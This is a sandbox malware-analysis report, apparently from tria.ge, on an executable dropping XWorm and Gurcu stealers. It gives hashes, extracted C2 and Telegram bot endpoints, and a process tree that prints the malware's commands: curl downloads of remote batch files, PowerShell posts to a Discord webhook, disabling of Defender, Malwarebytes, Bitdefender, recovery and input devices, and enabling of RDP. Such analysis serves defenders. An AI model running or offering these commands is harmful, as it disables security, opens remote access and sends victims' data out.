Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
898s -
max time network
903s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
-
submitted
20/03/2025, 18:47
General
-
Target
READ ME BEFOR OPEN.txt.exe
-
Size
84KB
-
MD5
5f8d77b4baf223ecde7556b0c1f63c89
-
SHA1
176ca0ebec13e5d80ce348204532612744735107
-
SHA256
159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
-
SHA512
befa25607d25902859dbb339e69d64d89e98264c88e848f2ed2b5c20aa7865b0e05658d4299deeb1aa9e79f3e58c2df61becb53285f857c0dc7a93091f864549
-
SSDEEP
1536:HEe2sHTvN2b4p98BcYCXSg0qMl3nRgt5P7ZJUqAA/WkywGKwkvOWkVqkl:72W0n4lEl3RE5veV2W3
Score
10/10
Malware Config
Extracted
Family
xworm
C2
looking-brings.gl.at.ply.gg:65381
Attributes
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y
Extracted
Family
gurcu
C2
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y/sendMessage?chat_id=1002422094535
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Xworm Payload 2 IoCs
-
Disables service(s) 3 TTPs
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 8 IoCs
-
Modifies security service 2 TTPs 4 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 27 IoCs
Using powershell.exe command.
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 2 IoCs
-
Manipulates Digital Signatures 1 TTPs 15 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Possible privilege escalation attempt 32 IoCs
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
Drops startup file 8 IoCs
-
Executes dropped EXE 6 IoCs
-
Modifies file permissions 1 TTPs 32 IoCs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 8 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
Drops file in Windows directory 9 IoCs
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 17 IoCs
-
Kills process with taskkill 38 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 49 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 44 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp67FC.tmp.bat""3⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:005⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵
-
-
C:\Windows\system32\curl.execurl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\openfiles.exeopenfiles4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in Windows directory
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exenet stop "security center"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"5⤵
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\net.exenet stop "wuauserv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "Windows Firewall"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"5⤵
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess5⤵
-
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
-
-
